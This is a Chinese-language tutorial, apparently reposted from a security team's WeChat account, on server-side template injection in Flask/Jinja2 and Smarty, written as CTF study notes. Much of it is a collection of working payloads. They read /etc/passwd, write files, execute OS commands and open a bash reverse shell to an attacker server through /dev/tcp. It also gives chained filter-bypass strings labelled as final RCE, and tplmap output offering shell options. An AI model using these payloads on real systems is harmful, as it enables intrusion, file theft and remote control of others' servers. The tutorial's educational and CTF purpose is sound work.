一文了解SSTI和所有常见payload 以flask模板为例

admin 2022年8月28日16:05:23安全文章评论4 views11666字阅读38分53秒阅读模式


一文了解SSTI和所有常见payload 以flask模板为例


前言

做的ctf题里有好几道跟SSTI有关
故对SSTI进行学习
在此做个小结与记录

主要是flask模板
后面遇到别的模板再陆续记录

1、什么是SSTI

SSTI,服务器端模板注入(Server-Side Template Injection)

  • 服务端接收攻击者的输入,将其作为Web应用模板内容的一部分

  • 在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容

  • 从而导致信息泄露、代码执行、GetShell等问题

  • 其影响范围主要取决于模版引擎的复杂性

注意:模板引擎 和 渲染函数 本身是没有漏洞的 , 该漏洞的产生原因在于程序员对代码的不严禁与不规范 , 导致了模板可控 , 从而引发代码注入

主要的框架

  • Python:jinja2、 mako、 tornado、 django

  • php:smarty、 twig

  • java:jade、 velocity

2、基础知识

模板引擎

模板引擎是以业务逻辑层和表现层分离为目的的,将规定格式的模板代码转换为业务数据的算法实现

也就是说,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
一文了解SSTI和所有常见payload 以flask模板为例
但是新的模板引擎往往会有一些安全问题 , 即使大部分模板引擎有提供沙箱隔离机制 , 但同样存在沙箱逃逸技术来绕过

页面渲染

页面渲染

  • 前端渲染( SPA , 单页面应用 )
    浏览器从服务器得到一些信息( 可能是 JSON 等各种数据交换格式所封装的数据包 , 也可能是合法的 HTML 字符串 )
    浏览器将这些信息排列组合成人类可读的 HTML 字符串 . 然后解析为最终的 HTML 页面呈现给用户
    整个过程都是由客户端浏览器完成的 , 因此对服务器后端的压力较小 , 仅需要传输数据即可

  • 后端渲染( SSR , 服务器渲染 )
    浏览器会直接接收到经过服务器计算并排列组合后的 HTML 字符串 , 浏览器仅需要将字符串解析为呈现给用户的 HTML 页面就可以了 .
    整个过程都是由服务器完成的 , 因此对客户端浏览器的压力较小 , 大部分任务都在服务器端完成了 , 浏览器仅需要解析并呈现 HTML 页面即可

参考后端渲染html、前端模板渲染html,jquery的html,各有什么区别?

3、flask模板

看得资料和做的题好多都是flask相关
所以下面的内容以 Flask 框架为例( Flask 使用 Jinja2 作为模板引擎)

环境搭建

Pycharm 内置的 Flask 框架
一文了解SSTI和所有常见payload 以flask模板为例
http://127.0.0.1:5000可见到欢迎界面
一文了解SSTI和所有常见payload 以flask模板为例
在 Run/Debug Configuration 中配置 DEBUG 模式
一文了解SSTI和所有常见payload 以flask模板为例
这样每次修改源文件后 , 仅需要保存并且刷新页面就可以看到内容更新了

注意:实际运行环境时是不可开启 DEBUG 模式的 , 非常危险

渲染方法

Flask 中的渲染方法有两种 : render_template() 和 render_template_string()

  • render_template() 函数
    渲染一个指定的文件 , 这个指定的文件其实就是模板
    一文了解SSTI和所有常见payload 以flask模板为例
    一文了解SSTI和所有常见payload 以flask模板为例
    一文了解SSTI和所有常见payload 以flask模板为例

  • render_template_string() 函数
    渲染一个字符串
    一文了解SSTI和所有常见payload 以flask模板为例
    一文了解SSTI和所有常见payload 以flask模板为例
    注:SSTI与render_template_string()函数密不可分

4、SSTI原理

一个最简单的例子

@app.route('/test')def test():    html = '{{12*12}}'    return flask.render_template_string(html)


一文了解SSTI和所有常见payload 以flask模板为例
发现{{ --- }}其中的语句被执行了

  • 这是因为在flask中,渲染引擎Jinja2会将{{ --- }}视为变量标识符,会将其包含的内容作为变量处理,从而包裹的语句被执行

  • 那么,在上一段代码中,如果我们传入的参数内容为{{ --- }}包裹的代码,这些代码就会被执行

沙箱逃逸

在上述例子中,虽然已经可以实现任意代码执行,但由于模板本身的沙盒安全机制,某些语句虽然可以执行,却不会执行成功
一文了解SSTI和所有常见payload 以flask模板为例
即使在服务器端将os包含进来,但是在渲染时仍然会出现这个错误,这就是因为沙盒机制严格地限制了程序的行为

沙箱逃逸的过程简单讲如下
一文了解SSTI和所有常见payload 以flask模板为例
借助的主要是各个类之间的继承关系
一些内建魔术方法如下
一文了解SSTI和所有常见payload 以flask模板为例

  • __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。

>>> ''.__class__<type 'str'>>>> ().__class__<type 'tuple'>>>> [].__class__<type 'list'>>>> {}.__class__<type 'dict'>
  • __bases__:用来查看类的基类,也可是使用数组索引来查看特定位置的值

>>> ().__class__.__bases__(<type 'object'>,)>>> ''.__class__.__bases__(<type 'basestring'>,)>>> [].__class__.__bases__(<type 'object'>,)>>> {}.__class__.__bases__(<type 'object'>,)>>> [].__class__.__bases__[0]<type 'object'>
  • __mro__:也可以获取基类

>>> ''.__class__.__mro__(<class 'str'>, <class 'object'>)>>> [].__class__.__mro__(<class 'list'>, <class 'object'>)>>> {}.__class__.__mro__(<class 'dict'>, <class 'object'>)>>> ().__class__.__mro__(<class 'tuple'>, <class 'object'>)>>> ().__class__.__mro__[1]            # 使用索引就能获取基类了<class 'object'>


SSTI主要就是活用各种魔术方法

5、引擎判断

服务端使用的各种引擎支持的语法是不同的
所以在找到SSTI注入点之后,首先应当判断模板所使用的渲染引擎

通常可以使用以下payload来简单测试:

一文了解SSTI和所有常见payload 以flask模板为例
绿色为执行成功,红色为执行失败
另:{{7*'7'}}在Twig中返回49,在Jinja2中返回77777777

6、SSTI利用

一些SSTI的利用方法

XSS

一文了解SSTI和所有常见payload 以flask模板为例
以 GET 方式从 URL 处获取 code 参数的值 , 然后将它输出到页面 .

这段代码非常容易看出来存在安全隐患 . 后端没有对用户输入的内容进行过滤 , 就直接将它输出到页面
输入端是完全可控的 . 这就产生了代码域与数据域的混淆

一文了解SSTI和所有常见payload 以flask模板为例

任意文件读写

这里就要用到上面所说的魔术方法了
一文了解SSTI和所有常见payload 以flask模板为例
仍然是上面这个源码

  • 获取字符串的类对象

>>> ''.__class__<type 'str'>


  • 寻找基类

>>> ''.__class__.__mro__(<type 'str'>, <type 'basestring'>, <type 'object'>)


  • 寻找可用引用

>>> ''.__class__.__mro__[2].__subclasses__()[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>]

可以看到有一个<type 'file'>

  • 最终payload

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

也可以是

()..__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()object.__subclasses__()[40]('/etc/passwd').read()

写文件相仿

''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')().__class__.__bases__[0].__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')object.__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')

任意代码执行

思路和任意文件读取非常类似 , 仅需要拿到 os 模块就可以了
可用payload如下

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()
# eval''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
#__import__''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()

反弹shell

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()

这个 Payload 不能直接放在 URL 中执行 , 因为 & 的存在会导致 URL 解析出现错误
可以使用 BurpSuite 等工具构造数据包再发送

一文了解SSTI和所有常见payload 以flask模板为例

其他

  • request.environ
    一个与服务器环境相关的对象字典 . 访问该字典可以拿到很多你期待的信息
    一文了解SSTI和所有常见payload 以flask模板为例

  • config.items
    一个类字典的对象 , 包含了所有应用程序的配置值
    在大多数情况下 , 它包含了比如数据库链接字符串 , 连接到第三方的凭证 , SECRET_KEY等敏感值

一文了解SSTI和所有常见payload 以flask模板为例

  • 一个小脚本

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}  {% for b in c.__init__.__globals__.values() %}  {% if b.__class__ == {}.__class__ %}    {% if 'eval' in b.keys() %}      {{ b['eval']('__import__("os").popen("id").read()') }}         //poppen的参数就是要执行的命令    {% endif %}  {% endif %}  {% endfor %}{% endif %}{% endfor %}

7、一些绕过

对一些过滤的绕过方法

过滤了小括号

用python的内置函数

  • get_flashed_messages()

  • url_for()

payload

{{url_for.__globals__}}{{url_for.__globals__['current_app'].config['FLAG']}}
{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

过滤了 class、 subclasses、 read等关键词

用request

  • GET: request.args

  • Cookies: request.cookies

  • Headers: request.headers

  • Environment: request.environ

  • Values: request.values

一些用法

  • request.__class__

  • request["__class__"]

  • request|attr("__class__")

payload

{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

过滤了下划线_

payload

{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_

其实现过程如下

{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}{{request|attr(["_"*2,"class","_"*2]|join)}}{{request|attr(["__","class","__"]|join)}}{{request|attr("__class__")}}{{request.__class__}}

过滤了中括号[]

payload

{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_

过滤了|join

|format
payload

{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_

无敌绕过的最终RCE

绕过[]检查,但不绕过__检查
使用该set函数来访问必需的object(i)
pop()将检索file对象,然后使用我们的已知参数调用该对象
与初始RCE相似,这将创建一个python文件/tmp/foo.py并执行print 1337有效负载

{%set%20a,b,c,d,e,f,g,h,i%20=%20request.__class__.__mro__%}{{i.__subclasses__().pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{{config.from_pyfile(request.args.file)}}&file=/tmp/foo.py&write=w&payload=print+1337

绕过所有黑名单检查的最终RCE
(真牛逼)

{%set%20a,b,c,d,e,f,g,h,i%20=%20request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)|attr((request.args.usc*2,request.args.mro,request.args.usc*2)|join)%}{{(i|attr((request.args.usc*2,request.args.subc,request.args.usc*2)|join)()).pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{{config.from_pyfile(request.args.file)}}&class=class&mro=mro&subc=subclasses&usc=_&file=/tmp/foo.py&write=w&payload=print+1337

8、神器tplmap

github
需要环境:PyYaml

例子

[email protected]:/mnt/hgfs/共享文件夹/tplmap-master# python tplmap.py -u "http://192.168.1.10:8000/?name=Sea"                             //判断是否是注入点[+] Tplmap 0.5    Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable[+] Smarty plugin is testing rendering with tag '*'[+] Smarty plugin is testing blind injection[+] Mako plugin is testing rendering with tag '${*}'[+] Mako plugin is testing blind injection[+] Python plugin is testing rendering with tag 'str(*)'[+] Python plugin is testing blind injection[+] Tornado plugin is testing rendering with tag '{{*}}'[+] Tornado plugin is testing blind injection[+] Jinja2 plugin is testing rendering with tag '{{*}}'[+] Jinja2 plugin has confirmed injection with tag '{{*}}'[+] Tplmap identified the following injection point:
GET parameter: name //说明可以注入,同时给出了详细信息 Engine: Jinja2 Injection: {{*}} Context: text OS: posix-linux Technique: render Capabilities:
Shell command execution: ok //检验出这些利用方法对于目标环境是否可用 Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options: //可以利用下面这些参数进行进一步的操作 --os-shell Run shell on the target --os-cmd Execute shell commands --bind-shell PORT Connect to a shell bind to a target port --reverse-shell HOST PORT Send a shell back to the attacker's port --upload LOCAL REMOTE Upload files to the server    --download REMOTE LOCAL  Download remote files

9、smarty SSTI

smarty是基于PHP开发的,官方文档
于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别

注入点:

  • XFF

  • Client IP

确认漏洞:

  • 输入{$smarty.version},返回smarty的版本号

{php}{/php}标签

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令

{php}phpinfo();{/php}

但在Smarty3的官方手册里有以下描述:

  • Smarty已经废弃{php}标签,强烈建议不要使用

  • 在Smarty 3.1,{php}仅在SmartyBC中可用

{literal}标签

官方手册这样描述这个标签:

  • {literal}可以让一个模板区域的字符原样输出

  • 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析

在php5的环境中可以使用

<script language="php">phpinfo();</script>

php7就不能用了

静态方法

通过self获取Smarty类再调用其静态方法实现文件读写

Smarty类的getStreamVariable方法的代码

public function getStreamVariable($variable){        $_result = '';        $fp = fopen($variable, 'r+');        if ($fp) {            while (!feof($fp) && ($current_line = fgets($fp)) !== false) {                $_result .= $current_line;            }            fclose($fp);            return $_result;        }        $smarty = isset($this->smarty) ? $this->smarty : $this;        if ($smarty->error_unassigned) {            throw new SmartyException('Undefined stream variable "' . $variable . '"');        } else {            return null;        }    }

这个方法可以读取一个文件并返回其内容
所以我们可以用self来获取Smarty对象并调用这个方法
很多文章里给的payload都形如:

{self::getStreamVariable("file:///etc/passwd")}

但在3.1.30的Smarty版本中官方已经把该静态方法删除

{if}标签

官方文档中的描述:

  • Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性

  • 每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif}

  • 全部的PHP条件表达式和函数都可以在if内使用,如||or&&and, is_array(), 等等,如:{if is_array($array)}{/if}

payload

{if phpinfo()}{/if}

结语

对SSTI做了个总结归纳

参考

  • Server-Side Template Injection

  • Jinja2 template injection filter bypasses

  • SSTI完全学习

  • Flask/Jinja2 SSTI && Python 沙箱逃逸基础

  • 从零学习flask模板注入

  • Smarty SSTI

  • CTF SSTI(服务器模板注入)






红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。


原文始发于微信公众号(红客突击队):一文了解SSTI和所有常见payload 以flask模板为例

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日16:05:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一文了解SSTI和所有常见payload 以flask模板为例 http://cn-sec.com/archives/1259661.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: